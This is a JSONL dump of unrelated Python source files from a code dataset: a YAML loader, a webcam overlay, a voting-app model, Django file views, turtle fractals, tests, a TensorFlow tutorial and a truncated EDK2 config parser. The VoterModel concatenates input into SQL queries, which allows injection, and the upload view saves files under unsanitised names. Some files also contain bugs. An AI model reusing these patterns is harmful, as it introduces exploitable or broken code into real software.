+{"seq_id":"26223609255","text":"\"\"\"Defines utilities for parsing YAML input.\"\"\"\nimport logging\nfrom typing import Any, List, Optional\n\nimport yaml\n\nlog = logging.getLogger(__name__)\n\n\ndef get_object_lists(yaml_file) -> Optional[List[List[Any]]]:\n \"\"\"Gets lists of objects from the yaml file.\n\n Assumes the file can have more than one document.\n\n Args:\n yaml_file: name of the yaml file\n Returns:\n List of lists of object read from the file\n \"\"\"\n with open(yaml_file, 'r', encoding='utf-8') as stream:\n return get_object_lists_from_stream(stream, yaml_file)\n\n\ndef get_object_lists_from_stream(stream,\n yaml_file) -> Optional[List[List[Any]]]:\n \"\"\"Gets list of objects from the IO stream.\n\n Assumes the file can have more than one document.\n\n Args:\n stream: IO stream\n yaml_file: the name of the file\n Returns:\n List of lists of objects created from file or None if an error occurs\n \"\"\"\n try:\n element_gen = yaml.safe_load_all(stream)\n except yaml.MarkedYAMLError as exception:\n log.error(\"Error in YAML file: %s\", yaml_file)\n mark = exception.problem_mark\n if mark:\n log.error(\"Error: line %s, column %s\", mark.line + 1,\n mark.column + 1)\n else:\n log.error(\"Error: %s\", exception)\n return None\n except yaml.YAMLError as exception:\n log.error(\"Error in YAML file: %s\", yaml_file)\n log.error(\"Error: %s\", exception)\n return None\n else:\n return [*element_gen]\n","repo_name":"naccdata/flywheel-gear-extensions","sub_path":"common/src/python/inputs/yaml.py","file_name":"yaml.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6407447181","text":"import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom winsound import *\r\n\r\nvid = cv2.VideoCapture(0)\r\nspider = cv2.imread('spider.png') \r\nimg_height, img_width, _ = spider.shape\r\nframe_width = vid.get(cv2.CAP_PROP_FRAME_WIDTH )\r\nframe_height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT )\r\nwhile(True):\r\n \r\n # Capture the video frame\r\n # by frame\r\n ret, frame = vid.read()\r\n \r\n face_cascade=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n gray=cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n faces=face_cascade.detectMultiScale(gray, 1.3, 5)\r\n for (x,y,w,h) in faces:\r\n frame[ y:y+img_height , x:x+img_width ] = spider\r\n roi_gray=gray[y:y+h, x:x+w]\r\n roi_color=frame[y:y+h, x:x+w]\r\n # Display the resulting frame\r\n cv2.imshow('frame', frame)\r\n \r\n # the 'q' button is set as the\r\n # quitting button you may use any\r\n # desired button of your choice\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n \r\n# After the loop release the cap object\r\nvid.release()\r\n# Destroy all the windows\r\ncv2.destroyAllWindows()","repo_name":"koushik2k3/face_recog-spiderman-mask","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"25218143673","text":"#!/usr/bin/python3\n\nfrom typing import List\nimport random\n\nclass Solution:\n def __init__(self, nums: List[int]) -> None:\n self.nums = nums\n\n def reset(self) -> List[int]:\n return self.nums\n\n def shuffle(self) -> List[int]:\n shuffled = self.nums[:]\n for i in range(len(shuffled) - 1, 0, -1):\n j = random.randrange(0, i + 1)\n shuffled[i], shuffled[j] = shuffled[j], shuffled[i]\n return shuffled\n\n\nnums = [1, 2, 3, 4]\nobj = Solution(nums)\nparam_1 = obj.reset()\nprint(param_1)\nparam_2 = obj.shuffle()\nprint(param_2)\n","repo_name":"sharmakajal0/Training","sub_path":"top-interview-questions-easy/design/shuffle_array.py","file_name":"shuffle_array.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"8408142825","text":"import pypyodbc\nimport Constants\nclass VoterModel:\n def __init__(self, voteID, title=\"\", firstName=\"\", middleName=\"\", lastName=\"\", wardNumber=\"\", streetName=\"\", area=\"\", city=\"\", district=\"\", state=\"\", dob=None, addressProof=\"\", ageProof=\"\", constituencyID=0, constituencyModel = None, isApproved=0, ssn=\"\", mobileNbr=\"\", emailID=\"\", password=\"\", gender=\"\"):\n self.voteID = voteID\n self.title = title\n self.firstName = firstName\n self.middleName = middleName\n self.lastName = lastName\n self.wardNumber = wardNumber\n self.streetName = streetName\n self.area = area\n self.city = city\n self.district = district\n self.state = state\n self.dob = dob\n self.addressProof = addressProof\n self.ageProof = ageProof\n self.constituencyID = constituencyID\n self.constituencyModel = constituencyModel\n self.isApproved = isApproved\n self.ssn = ssn\n self.mobileNbr = mobileNbr\n self.emailID = emailID\n self.password = password\n self.gender=gender\n \n @staticmethod\n def getVoterByID(rid):\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\n cur3 = conn3.cursor()\n \n sqlcmd = \"SELECT voteID, firstName FROM VoterMaster WHERE voteID = '\"+str(rid)+\"'\"\n print(\"DDDDDDDDDDDDDDDDDDDDD\", sqlcmd)\n cur3.execute(sqlcmd)\n row = cur3.fetchone()\n voterModel = None\n if row:\n voterModel = VoterModel(row[0], firstName=row[1])\n return voterModel\n \n \n @staticmethod\n def getVoterByEmailID(emailID):\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\n cur3 = conn3.cursor()\n \n sqlcmd = \"SELECT voteID, firstName FROM VoterMaster WHERE emailID = '\"+str(emailID)+\"'\"\n print(\"DDDDDDDDDDDDDDDDDDDDD\", sqlcmd)\n cur3.execute(sqlcmd)\n row = cur3.fetchone()\n voterModel = None\n if row:\n voterModel = VoterModel(row[0], firstName=row[1])\n return voterModel \n","repo_name":"dhruv989/online-voting","sub_path":"E-VotingV2/src/VoterModel.py","file_name":"VoterModel.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28285451281","text":"import os\nfrom wsgiref.util import FileWrapper\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom core.forms import MyUploadForm, ConfigForm\n\n\ndef index(request):\n file_upload_form = MyUploadForm(request.POST, request.FILES)\n return render(request, \"core/index.html\", {'form': file_upload_form})\n\n\ndef handle_uploaded_file(f):\n filename = f.__str__()\n directory = \"uploaded/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(directory + filename, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n\n\ndef render_main_page(request):\n config_form = ConfigForm()\n upload_form = MyUploadForm()\n if request.method == 'POST':\n handle_uploaded_file(request.FILES['file_'])\n return render(request, 'core/index.html',\n {\n 'form': upload_form,\n 'uploaded': True,\n 'config_form': config_form,\n })\n elif request.method == 'GET':\n config_form = ConfigForm(initial={\n 'config_name': 'default_config_name',\n 'train_start_date': '01-01-2017',\n })\n return render(request, 'core/index.html',\n {\n 'form': upload_form,\n 'uploaded': False,\n 'config_form': config_form,\n })\n\n\nneeded_report_name = 'random_algorithm_report100'\n\n\ndef run_algorithm(request):\n # define which algorithm was chosen and return needed\n algo_name = request.POST[\"algo_name\"]\n config_name = request.POST[\"config_name\"]\n\n ################# GETTING CONFIG PATH ######################\n # Getting path to config\n if config_name == \"config1\":\n config_path = \"100days\"\n elif config_name == \"config2\":\n config_path = \"250days\"\n else:\n assert False\n\n from loader import Loader\n ################# RUNNING ALGORITHM ON CONFIG ##############\n # Running needed algorithm using config_path\n if algo_name == \"random_algorithm\":\n # run random algorithm\n # generate random report\n global needed_report_name\n if config_path == \"100days\":\n Loader(config_filename='config100_random.cfg')\n needed_report_name = 'random_algorithm_report100.pdf'\n if config_path == \"250days\":\n Loader(config_filename='config250_random.cfg')\n needed_report_name = 'random_algorithm_report250.pdf'\n\n elif algo_name == \"clever_algorithm\":\n # run clever algorithm\n # generate clever report\n global needed_report_name\n if config_path == \"100days\":\n Loader(config_filename='config100_clever.cfg')\n needed_report_name = 'clever_algorithm_report100.pdf'\n if config_path == \"250days\":\n Loader(config_filename='config250_clever.cfg')\n needed_report_name = 'clever_algorithm_report250.pdf'\n else:\n assert False\n\n print('Run algorithm!')\n\n return HttpResponse('')\n\n\ndef download_file_button_click(request):\n global needed_report_name\n path = \"Framework_src/pdf_reports/\"\n our_report = open(path + needed_report_name, \"r\")\n response = HttpResponse(FileWrapper(our_report),\n content_type=\"application/pdf\")\n response[\"Content-Disposition\"] = 'attachment;filename=' + \\\n needed_report_name\n our_report.close()\n return response\n","repo_name":"FRTP/Landing","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74578360209","text":"expressao = str(input('Digite uma expressão com parêntesis: ')).strip().lower()\nparent_inicial = 0\npos_inicial = []\nparent_final = 0\npos_final = []\nerro = False\nfor pos, c in enumerate(expressao):\n if '(' in c:\n parent_inicial += 1\n pos_inicial.append(pos)\n elif ')' in c:\n parent_final += 1\n pos_final.append(pos)\n''' Prints usados para teste do programa:\nprint(parent_inicial)\nprint(pos_inicial)\nprint(parent_final)\nprint(pos_final)'''\nif parent_inicial != parent_final:\n erro = True\nelse:\n for c in range(0, len(pos_inicial)):\n if pos_inicial[c] > pos_final[c]:\n erro = True\n break\nif erro is True:\n print('A expressão contém um erro nos parêntesis!')\nelse:\n print('A equação está com os parêntesis corretos!')\n","repo_name":"Zeldyy/exercicios-python-cursoemvideo","sub_path":"Exercícios Python/ex083.py","file_name":"ex083.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70250901290","text":"import turtle\n\n\nmy_turtle = turtle.Turtle()\nmy_win = turtle.Screen()\n\ndef draw_spiral(my_turtle, line_len):\n if line_len > 0:\n my_turtle.forward(line_len)\n my_turtle.right(90)\n draw_spiral(my_turtle, line_len-5)\n\n\ndraw_spiral(my_turtle, 100)\nmy_win.exitonclick()\n\n\ndef tree(branch_len, t):\n if branch_len > 5:\n t.forward(branch_len)\n t.right(20)\n tree(branch_len-15, t)\n t.left(40)\n tree(branch_len-10, t)\n t.right(20)\n t.backward(branch_len)\n\ndef main():\n t = turtle.Turtle()\n my_win = turtle.Screen()\n t.left(90)\n t.up()\n t.backward(100)\n t.down()\n t.color(\"green\")\n tree(75, t)\n my_win.exitonclick()\n\n\ndef draw_triangle(points, color):\n t.fillcolro(color)\n t.penup()\n t.goto(points['top'])\n t.pendown()\n t.begin_fill()\n t.goto(points['left'])\n t.goto(points['right'])\n t.goto(points['top'])\n t.end_fill()\n\n\n\ndef get_mid(p1, p2):\n return((p1[0] + p2[0]) / 2, (p1[1] + p2[1]) / 2)\n\n\ndef sierpinski(ponits, degree, my_turtle):\n color_map = [\"blue\", \"red\", \"green\", \"white\", \"yellow\", \"violet\", \"orange\"]\n draw_triangle(ponits, color_map[degree], my_turtle)\n if degree > 0:\n sierpinski([points[0], get_mid(points[0], ponits[1]), get_points(ponits[0], points[2])], degree-1, my_turtle)\n sierpinski([points[1], get_mid(points[0], ponits[1]), get_points(ponits[1], points[2])], degree-1, my_turtle)\n sierpinski([points[2], get_mid(points[2], ponits[1]), get_points(ponits[0], points[2])], degree-1, my_turtle)\n\n\ndef main():\n my_turtle = turtle.Turtle()\n my_win = turtle.Screen()\n my_points = [[-100, -50], [0, 100], [100, -50]]\n sierpinski(my_points, 3, my_turtle)\n\nmain()\n\n","repo_name":"chcorophyll/algorithm_4th","sub_path":"PekingUniversity/recursion/turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71814842408","text":"# --------------------------------#\n# Limpiar pantalla\nfrom pantallas import *\nlimpiar()\n# --------------------------------#\n\n# Enviar concatenar\ndef miFuncionLLista(lista):\n i = ''\n for elemento in lista:\n i = i + elemento + ' '\n return i\n\n\n\nvalores = miFuncionLLista(['Valor 1', 'Otro valor','3er. Valor'])\nprint(valores)\n\n","repo_name":"terracenter/Cursos","sub_path":"Python/Nicolas/Seccion_8_Contro_de_flujo/44.03.mas_funciones_concatenacion.py","file_name":"44.03.mas_funciones_concatenacion.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"es","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"28727789134","text":"import json\nimport random\n\nfrom copy import deepcopy\nfrom ai_transform.operator.abstract_operator import AbstractOperator\nfrom ai_transform.utils.document import Document\nfrom ai_transform.utils.example_documents import mock_documents, generate_random_label, generate_random_vector\n\n\nclass TestDocumentDiff:\n def test_diff1(self):\n old_documents = mock_documents(3)\n new_documents = deepcopy(old_documents)\n\n expected_diff = []\n\n for document in new_documents:\n new_chunk = {\"label\": generate_random_label(), \"label_chunkvector_\": generate_random_vector()}\n document[\"_chunk_\"].append(new_chunk)\n expected_diff.append({\"_id\": document[\"_id\"], \"_chunk_\": document[\"_chunk_\"]})\n\n diff = AbstractOperator._postprocess(new_documents, old_documents).to_json()\n diff = list(sorted(diff, key=lambda x: x[\"_id\"]))\n expected_diff = list(sorted(expected_diff, key=lambda x: x[\"_id\"]))\n\n assert json.dumps(diff, sort_keys=True) == json.dumps(expected_diff, sort_keys=True)\n\n def test_update_diff(self):\n old_documents = [Document({\"label\": \"yes\"}) for _ in range(5)]\n new_documents = deepcopy(old_documents)\n for document in new_documents:\n document[\"label\"] = \"no\"\n\n diff = AbstractOperator._postprocess(new_documents, old_documents)\n expected_diff = json.dumps({\"label\": \"no\"})\n\n assert all(json.dumps(document.to_json()) == expected_diff for document in diff)\n\n def test_no_diff(self):\n documents = [Document({\"value\": 10})]\n diff = AbstractOperator._postprocess(documents, documents)\n assert not diff\n\n def test_chunk_diff(self):\n old_documents = [Document({\"example_vector_\": [random.random() for _ in range(5)]}) for _ in range(5)]\n new_documents = deepcopy(old_documents)\n for document in new_documents:\n document[\"label\"] = \"yes\"\n\n diff = AbstractOperator._postprocess(new_documents, old_documents)\n expected_diff = json.dumps({\"label\": \"yes\"})\n\n assert all(json.dumps(document.to_json()) == expected_diff for document in diff)\n","repo_name":"RelevanceAI/ai-transform","sub_path":"tests/core/test_operator/test_document_diff.py","file_name":"test_document_diff.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"37831757776","text":"import os\nimport tempfile\n\nimport pytest\n\nfrom app import create_app\nfrom models import db\n\n\n@pytest.fixture\ndef client():\n app = create_app()\n db_fd, app.config[\"DATABASE\"] = tempfile.mkstemp()\n app.config[\"TESTING\"] = True\n app.secret_key = \"sekrit!\"\n with app.test_client() as client:\n with app.app_context():\n db.drop_all()\n db.create_all()\n yield client\n os.close(db_fd)\n os.unlink(app.config[\"DATABASE\"])\n","repo_name":"drizzleco/feeds","sub_path":"tests/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30692952387","text":"#%tensorflow_version 2.x # this line is not required unless you are in a notebook\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom IPython.display import clear_output\nfrom six.moves import urllib\n\nimport tensorflow.compat.v2.feature_column as fc\n\nimport tensorflow as tf\n\n# Load dataset.\ndftrain = pd.read_csv('train.csv') # training data\ndfeval = pd.read_csv('eval.csv') # testing data\ny_train = dftrain.pop('survived') # removing survived column and storing it in y_train\ny_eval = dfeval.pop('survived') # as above\n\n\n# distinguish from numerical and categorical data (those who have values different then numbers)\nCATEGORICAL_COLUMNS = ['sex', 'n_siblings_spouses', 'parch', 'class', 'deck',\n 'embark_town', 'alone']\nNUMERIC_COLUMNS = ['age', 'fare']\n\n# columns created from those above\nfeature_columns = []\n\n# iterate over categorical columns and finds all unique values and saves it in fetures_column using ts - tensorflow\nfor feature_name in CATEGORICAL_COLUMNS:\n vocabulary = dftrain[feature_name].unique() # gets a list of all unique values from given feature column\n feature_columns.append(tf.feature_column.categorical_column_with_vocabulary_list(feature_name, vocabulary))\n\n# same for numerical values\nfor feature_name in NUMERIC_COLUMNS:\n feature_columns.append(tf.feature_column.numeric_column(feature_name, dtype=tf.float32))\n\n\n# Creating input function, basically it creates tensorflow DATASET OBJECT on which model trains\ndef make_input_fn(data_df, label_df, num_epochs=10, shuffle=True, batch_size=32):\n def input_function(): # inner function, this will be returned\n ds = tf.data.Dataset.from_tensor_slices((dict(data_df), label_df)) # create tf.data.Dataset object with data and its label\n if shuffle:\n ds = ds.shuffle(1000) # randomize order of data\n ds = ds.batch(batch_size).repeat(num_epochs) # split dataset into batches of 32 and repeat process for number of epochs\n return ds # return a batch of the dataset\n return input_function # return a function object for use\n\n# here we will call the input_function that was returned to us to get a dataset object we can feed to the model\n# as arguments - training dataset file and file with 'survived' column\ntrain_input_fn = make_input_fn(dftrain, y_train) \n\n# only one epoch, couse it do not train, just eval, and also don't need to be shuffled\n# as arguments: as above, just testing datasets\neval_input_fn = make_input_fn(dfeval, y_eval, num_epochs=1, shuffle=False) \n\n\n# Creating a model\n# create a linear estimtaor by passing the feature columns created earlier\nlinear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns) \n\n\n# TRAINING model\nlinear_est.train(train_input_fn) # train\nresult = linear_est.evaluate(eval_input_fn) # get model metrics/stats by testing on tetsing data\n\nclear_output() # clears console output\nprint(result['accuracy']) # the result variable is simply a dict of stats about our model, accuracy gives how good is model\n\nresult = list(linear_est.predict(eval_input_fn))\nprint(dfeval.loc[0]) # print person on index\nprint(y_eval.loc[0]) # print if survived or not (0 or 1)\nprint(result[0]['probabilities'][1]) # print what the trained model predict (probabilities on index 0 = died probability, on index 1 survival probability) for person on index ","repo_name":"JakubCzerwiec/Titanic","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37608541619","text":"## @file\r\n# This file is used to define each component of tools_def.txt file\r\n#\r\n# Copyright (c) 2007 - 2021, Intel Corporation. All rights reserved.
\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\n\r\n##\r\n# Import Modules\r\n#\r\nfrom __future__ import absolute_import\r\nimport Common.LongFilePathOs as os\r\nimport re\r\nfrom . import EdkLogger\r\n\r\nfrom .BuildToolError import *\r\nfrom Common.TargetTxtClassObject import TargetTxtDict\r\nfrom Common.LongFilePathSupport import OpenLongFilePath as open\r\nfrom Common.Misc import PathClass\r\nfrom Common.StringUtils import NormPath\r\nimport Common.GlobalData as GlobalData\r\nfrom Common import GlobalData\r\nfrom Common.MultipleWorkspace import MultipleWorkspace as mws\r\nfrom .DataType import TAB_TOD_DEFINES_TARGET, TAB_TOD_DEFINES_TOOL_CHAIN_TAG,\\\r\n TAB_TOD_DEFINES_TARGET_ARCH, TAB_TOD_DEFINES_COMMAND_TYPE\\\r\n , TAB_TOD_DEFINES_FAMILY, TAB_TOD_DEFINES_BUILDRULEFAMILY,\\\r\n TAB_STAR, TAB_TAT_DEFINES_TOOL_CHAIN_CONF\r\n\r\n\r\n##\r\n# Static variables used for pattern\r\n#\r\ngMacroRefPattern = re.compile('(DEF\\([^\\(\\)]+\\))')\r\ngEnvRefPattern = re.compile('(ENV\\([^\\(\\)]+\\))')\r\ngMacroDefPattern = re.compile(\"DEFINE\\s+([^\\s]+)\")\r\ngDefaultToolsDefFile = \"tools_def.txt\"\r\n\r\n## ToolDefClassObject\r\n#\r\n# This class defined content used in file tools_def.txt\r\n#\r\n# @param object: Inherited from object class\r\n# @param Filename: Input value for full path of tools_def.txt\r\n#\r\n# @var ToolsDefTxtDictionary: To store keys and values defined in target.txt\r\n# @var MacroDictionary: To store keys and values defined in DEFINE statement\r\n#\r\nclass ToolDefClassObject(object):\r\n def __init__(self, FileName=None):\r\n self.ToolsDefTxtDictionary = {}\r\n self.MacroDictionary = {}\r\n for Env in os.environ:\r\n self.MacroDictionary[\"ENV(%s)\" % Env] = os.environ[Env]\r\n\r\n if FileName is not None:\r\n self.LoadToolDefFile(FileName)\r\n\r\n ## LoadToolDefFile\r\n #\r\n # Load target.txt file and parse it\r\n #\r\n # @param Filename: Input value for full path of tools_def.txt\r\n #\r\n def LoadToolDefFile(self, FileName):\r\n # set multiple workspace\r\n PackagesPath = os.getenv(\"PACKAGES_PATH\")\r\n mws.setWs(GlobalData.gWorkspace, PackagesPath)\r\n\r\n self.ToolsDefTxtDatabase = {\r\n TAB_TOD_DEFINES_TARGET : [],\r\n TAB_TOD_DEFINES_TOOL_CHAIN_TAG : [],\r\n TAB_TOD_DEFINES_TARGET_ARCH : [],\r\n TAB_TOD_DEFINES_COMMAND_TYPE : []\r\n }\r\n\r\n self.IncludeToolDefFile(FileName)\r\n\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET] = list(set(self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET]))\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG] = list(set(self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]))\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET_ARCH] = list(set(self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET_ARCH]))\r\n\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_COMMAND_TYPE] = list(set(self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_COMMAND_TYPE]))\r\n\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET].sort()\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG].sort()\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET_ARCH].sort()\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_COMMAND_TYPE].sort()\r\n\r\n ## IncludeToolDefFile\r\n #\r\n # Load target.txt file and parse it as if its contents were inside the main file\r\n #\r\n # @param Filename: Input value for full path of tools_def.txt\r\n #\r\n def IncludeToolDefFile(self, FileName):\r\n FileContent = []\r\n if os.path.isfile(FileName):\r\n try:\r\n F = open(FileName, 'r')\r\n FileContent = F.readlines()\r\n except:\r\n EdkLogger.error(\"tools_def.txt parser\", FILE_OPEN_FAILURE, ExtraData=FileName)\r\n else:\r\n EdkLogger.error(\"tools_def.txt parser\", FILE_NOT_FOUND, ExtraData=FileName)\r\n\r\n for Index in range(len(FileContent)):\r\n Line = FileContent[Index].strip()\r\n if Line == \"\" or Line[0] == '#':\r\n continue\r\n\r\n if Line.startswith(\"!include\"):\r\n IncFile = Line[8:].strip()\r\n Done, IncFile = self.ExpandMacros(IncFile)\r\n if not Done:\r\n EdkLogger.error(\"tools_def.txt parser\", ATTRIBUTE_NOT_AVAILABLE,\r\n \"Macro or Environment has not been defined\",\r\n ExtraData=IncFile[4:-1], File=FileName, Line=Index+1)\r\n IncFile = NormPath(IncFile)\r\n\r\n if not os.path.isabs(IncFile):\r\n #\r\n # try WORKSPACE\r\n #\r\n IncFileTmp = PathClass(IncFile, GlobalData.gWorkspace)\r\n ErrorCode = IncFileTmp.Validate()[0]\r\n if ErrorCode != 0:\r\n #\r\n # try PACKAGES_PATH\r\n #\r\n IncFileTmp = mws.join(GlobalData.gWorkspace, IncFile)\r\n if not os.path.exists(IncFileTmp):\r\n #\r\n # try directory of current file\r\n #\r\n IncFileTmp = PathClass(IncFile, os.path.dirname(FileName))\r\n ErrorCode = IncFileTmp.Validate()[0]\r\n if ErrorCode != 0:\r\n EdkLogger.error(\"tools_def.txt parser\", FILE_NOT_FOUND, ExtraData=IncFile)\r\n\r\n if isinstance(IncFileTmp, PathClass):\r\n IncFile = IncFileTmp.Path\r\n else:\r\n IncFile = IncFileTmp\r\n\r\n self.IncludeToolDefFile(IncFile)\r\n continue\r\n\r\n NameValuePair = Line.split(\"=\", 1)\r\n if len(NameValuePair) != 2:\r\n EdkLogger.warn(\"tools_def.txt parser\", \"Line %d: not correct assignment statement, skipped\" % (Index + 1))\r\n continue\r\n\r\n Name = NameValuePair[0].strip()\r\n Value = NameValuePair[1].strip()\r\n\r\n if Name == \"IDENTIFIER\":\r\n EdkLogger.debug(EdkLogger.DEBUG_8, \"Line %d: Found identifier statement, skipped: %s\" % ((Index + 1), Value))\r\n continue\r\n\r\n MacroDefinition = gMacroDefPattern.findall(Name)\r\n if MacroDefinition != []:\r\n Done, Value = self.ExpandMacros(Value)\r\n if not Done:\r\n EdkLogger.error(\"tools_def.txt parser\", ATTRIBUTE_NOT_AVAILABLE,\r\n \"Macro or Environment has not been defined\",\r\n ExtraData=Value[4:-1], File=FileName, Line=Index+1)\r\n\r\n MacroName = MacroDefinition[0].strip()\r\n self.MacroDictionary[\"DEF(%s)\" % MacroName] = Value\r\n EdkLogger.debug(EdkLogger.DEBUG_8, \"Line %d: Found macro: %s = %s\" % ((Index + 1), MacroName, Value))\r\n continue\r\n\r\n Done, Value = self.ExpandMacros(Value)\r\n if not Done:\r\n EdkLogger.error(\"tools_def.txt parser\", ATTRIBUTE_NOT_AVAILABLE,\r\n \"Macro or Environment has not been defined\",\r\n ExtraData=Value[4:-1], File=FileName, Line=Index+1)\r\n\r\n List = Name.split('_')\r\n if len(List) != 5:\r\n EdkLogger.verbose(\"Line %d: Not a valid name of definition: %s\" % ((Index + 1), Name))\r\n continue\r\n elif List[4] == TAB_STAR:\r\n EdkLogger.verbose(\"Line %d: '*' is not allowed in last field: %s\" % ((Index + 1), Name))\r\n continue\r\n else:\r\n self.ToolsDefTxtDictionary[Name] = Value\r\n if List[0] != TAB_STAR:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET] += [List[0]]\r\n if List[1] != TAB_STAR:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG] += [List[1]]\r\n if List[2] != TAB_STAR:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET_ARCH] += [List[2]]\r\n if List[3] != TAB_STAR:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_COMMAND_TYPE] += [List[3]]\r\n if List[4] == TAB_TOD_DEFINES_FAMILY and List[2] == TAB_STAR and List[3] == TAB_STAR:\r\n if TAB_TOD_DEFINES_FAMILY not in self.ToolsDefTxtDatabase:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY] = {}\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][List[1]] = Value\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY] = {}\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][List[1]] = Value\r\n elif List[1] not in self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY]:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][List[1]] = Value\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][List[1]] = Value\r\n elif self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][List[1]] != Value:\r\n EdkLogger.verbose(\"Line %d: No override allowed for the family of a tool chain: %s\" % ((Index + 1), Name))\r\n if List[4] == TAB_TOD_DEFINES_BUILDRULEFAMILY and List[2] == TAB_STAR and List[3] == TAB_STAR:\r\n if TAB_TOD_DEFINES_BUILDRULEFAMILY not in self.ToolsDefTxtDatabase \\\r\n or List[1] not in self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY]:\r\n EdkLogger.verbose(\"Line %d: The family is not specified, but BuildRuleFamily is specified for the tool chain: %s\" % ((Index + 1), Name))\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][List[1]] = Value\r\n\r\n ## ExpandMacros\r\n #\r\n # Replace defined macros with real value\r\n #\r\n # @param Value: The string with unreplaced macros\r\n #\r\n # @retval Value: The string which has been replaced with real value\r\n #\r\n def ExpandMacros(self, Value):\r\n # os.environ contains all environment variables uppercase on Windows which cause the key in the self.MacroDictionary is uppercase, but Ref may not\r\n EnvReference = gEnvRefPattern.findall(Value)\r\n for Ref in EnvReference:\r\n if Ref not in self.MacroDictionary and Ref.upper() not in self.MacroDictionary:\r\n Value = Value.replace(Ref, \"\")\r\n else:\r\n if Ref in self.MacroDictionary:\r\n Value = Value.replace(Ref, self.MacroDictionary[Ref])\r\n else:\r\n Value = Value.replace(Ref, self.MacroDictionary[Ref.upper()])\r\n MacroReference = gMacroRefPattern.findall(Value)\r\n for Ref in MacroReference:\r\n if Ref not in self.MacroDictionary:\r\n return False, Ref\r\n Value = Value.replace(Ref, self.MacroDictionary[Ref])\r\n\r\n return True, Value\r\n\r\n## ToolDefDict\r\n#\r\n# Load tools_def.txt in input Conf dir\r\n#\r\n# @param ConfDir: Conf dir\r\n#\r\n# @retval ToolDef An instance of ToolDefClassObject() with loaded tools_def.txt\r\n#\r\n\r\n\r\nclass ToolDefDict():\r\n\r\n def __new__(cls, ConfDir, *args, **kw):\r\n if not hasattr(cls, '_instance'):\r\n orig = super(ToolDefDict, cls)\r\n cls._instance = orig.__new__(cls, *args, **kw)\r\n return cls._instance\r\n\r\n def __init__(self, ConfDir):\r\n self.ConfDir = ConfDir\r\n if not hasattr(self, 'ToolDef'):\r\n self._ToolDef = None\r\n\r\n @property\r\n def ToolDef(self):\r\n if not self._ToolDef:\r\n self._GetToolDef()\r\n return 